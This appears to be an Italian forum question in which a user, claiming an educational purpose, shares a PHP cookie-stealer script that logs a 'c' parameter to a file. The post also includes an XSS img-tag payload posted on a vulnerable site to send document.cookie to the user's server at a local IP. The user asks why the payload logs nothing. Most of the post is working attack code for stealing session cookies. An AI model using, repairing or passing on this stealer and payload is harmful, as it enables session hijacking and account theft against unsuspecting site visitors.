Sto tentando di rubare i cookie per scopi didattici e per questo ho installato un server malintenzionato in cui il mio sito Web malevolo sta eseguendo il furto di cookie di utenti e funziona quando visito come
Registra qualunque cosa detenga il parametro c, nel caso sopra document.cookie string.
Il semplice cookie stealer contiene le seguenti righe di codice
<?php
header('Location:https://google.com');
$cookies = $_GET["c"];
$file = fopen('log.txt', 'a');
fwrite($file, $cookies . "\n\n");
?>
Il problema è quando utilizzo lo stesso link nell'attributo img tag src, non registra nulla nel file log.txt. Sto usando il seguente post sul sito vulnerabile;
<img src="http://192.168.8.102/cookiestealer.php?c="+document.cookieonerror="alert('Your cookie has been served')" />
Ma non registra nulla sul server. Tuttavia il file cambia mentre l'editor mi suggerisce di ricaricare ma non c'è nulla di scritto su di esso. Non esiste HTTPOnly = true per alcun cookie su questo sito.
Qualche suggerimento? THanks.